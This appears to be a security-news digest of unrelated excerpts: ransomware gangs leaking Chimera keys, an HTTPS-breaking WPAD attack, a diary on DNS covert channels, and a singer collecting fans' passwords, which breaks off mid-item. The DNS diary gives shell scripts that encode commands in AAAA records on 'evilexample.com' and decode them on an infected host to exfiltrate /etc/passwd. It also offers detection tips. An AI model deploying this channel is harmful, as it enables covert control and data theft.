Information Security News
Sometimes, the fierce competition in the booming crypto ransomware market works in the favor of the victims whose priceless data is held hostage. That appears to be what played out on Tuesday when the criminals behind a package known as "Mischa" published what's purported to be the secret crypto keys for the rival Chimera malware.
"Earlier this year we got access to big parts of their deveolpment [sic] system, and included parts of Chimera in our project," the Mischa developers wrote in a message posted to Pastebin. "Additionally we now release about 3500 decryption keys from Chimera."
Translation: As if breaking in to the Chimera developers' network and stealing their code wasn't enough of an affront, the competing Mischa gang now claims to have leaked the keys that defang Chimera.
A key guarantee provided by HTTPS encryption is that the addresses of visited websites aren't visible to attackers who may be monitoring an end user's network traffic. Now, researchers have devised an attack that breaks this protection.
The attack can be carried out by operators of just about any type of network, including public Wi-Fi networks, which arguably are the places where Web surfers need HTTPS the most. It works by abusing a feature known as WPAD—short for Web Proxy Autodisovery—in a way that exposes certain browser requests to attacker-controlled code. The attacker then gets to see the entire URL of every site the target visits. The exploit works against virtually all browsers and operating systems. It will be demonstrated for the first time at next week's Black Hat security conference in Las Vegas in a talk titled Crippling HTTPS with Unholy PAC.
"People rely on HTTPS to secure their communication even when the LAN/Wi-Fi cannot be trusted (think public Wi-Fi/hotels/cafes/airports/restaurants, or compromised LAN in an organization)," Itzik Kotler, cofounder and CTO of security firm SafeBreach and one of the scheduled speakers, wrote in an e-mail. "We show that HTTPS cannot provide security when WPAD is enabled. Therefore, a lot of people are actually exposed to this attack when they engage in browsing via non-trusted networks."
Dataexfiltrationand command and control channels via DNS are nothing new exactly. In many ways, DNS is an ideal covert channel. Even well-protected systems usually can connect to a recursive name server that will forward queries to any authoritative name server. The bucket chain of DNS servers will bypass whatever firewall is used to protect the system. Intrusion detection systems have implemented signatures for abnormally large queries, but often valid domain names are rather long, in particular, if they are associated with public clouds or content delivery networks.DNSSECrecords also tend to trigger some of these signatures.
Traditionally, an infected system willexfiltratedata using A records, and then request new commands to be executed using TXT records. While A records work great toexfiltratedata, TXT records are more problematic as they are less commonly used and tend to stick out more.
Note that we are not interested in implementing a complete IP over DNS tunnel here like dnscat2 or iodine. We try to be stealthy on the network by using as few and as normal DNS queries as possible, and we are trying to be covert on the system by using common command line tools instead of installing additional software that may trigger anti-malware systems.
There are a couple of methods that can be used to return more meaningful data than anIPv4address in a DNS A query response:
But to do either, we need a custom DNS server. I was trying to find a way to pass data back to the infected system without having to code up a new DNS server (ok, there isScapy-) ... maybe that will be a second diary).
AAAA records, on the other hand, return four times as much data as A records, and by returning multiple AAAA records, we can encode reasonably complex commands. We could do the same with A records, but doing so with AAAA records turns out to be a lot simpler.
First, we need to encode a set of commands in AAAA records. To do this, we convert the content of the file we are trying to encode into hex, and then use the dynamic DNS utility nsupdate to add the respective records to our zone (I am using evilexample.com here):
file2ipv6.sh:#!/bin/shn=2000echo server localhostecho zone evilexample.comecho prereq yxrrset a.evilexample.com AAAAecho update delete a.evilexample.comecho sendfor b in `xxd -p -c 14 $1 | sed s/..../:/g | sed s/:$// do f=$n:$b f=`echo $f | sed s/:..$/00/` f=`echo $f:0000:0000:0000:0000:0000:0000:0000:0000 | head -c39` echo update a.evilexample.com. 10 AAAA $fdoneecho send
Lets incode the following string (in sample.txt done
This command, once executed on the receiving end, willexfiltratethe content of /etc/passwd
Next, we use file2ipv6.sh to create the necessaryAAAArecords. nsupdate will pass the commands to the authoritative name server. the dns.key is the update key for the zone you are using (if you configured one).
./file2ipv6.sh sample.txt | nsupdate -k dns.key
Once this completes, you should see the followingAAAArecords:
$ dig +short AAAA a.evilexample.com2003:7274:2024:622e:6576:696c:6578:616d2004:706c:652e:636f:6d3b:2064:6f6e:650a2000:666f:7220:6220:696e:2060:7878:64202001:2d70:202f:6574:632f:7061:7373:77642002:603b:2064:6f20:6469:6720:2b73:686f
Note how the first two bytes are used as a serial number as the order in which the records are returned may change.
On the receiving end (infected system), we can now extract the data with a simple shell script:
dig +short AAAA a.evilexample.com | sort -n | cut -f2- -d: | tr -d : | xxd -p -c 14 -r
To execute the script above, just enclose it in backticks, add it to a cron job or whatever, and you got a command and control channel over IPv6. Best part: All you need on the infected host is a shell script.
You can find the script above on github:https://github.com/DShield-ISC/IPv6DNSExfil
Why use bash vs. perl/python? Because it works!
How do we detect these covert channels?
The best method is likely to monitor the volume of DNS queries from particular hosts. Mail servers tend to sent a lot of DNS queries. But other, normal servers, will only send few. You could implement rate limiting on the recursive web server to disrupt the covert channel, or just monitor your query logs or traffic logs to detect abnormal volumes of DNS traffic from particular hosts.
As a new way to connect with his fans, Jack Johnson—one half of the pop-rap duo Jack & Jack, not to be confused with the laid back Hawaiian singer-songwriter of the same name—has spent the last month soliciting social media passwords.
Using the hashtag #HackedByJohnson, the performer has tweeted at his fans to send him their passwords. (Why he didn’t go for the shorter and catchier #JackHack, we’ll never know.) Then, Johnson posts under his fans’ Twitter accounts, leaving a short personalized message, as them.
Here's one example: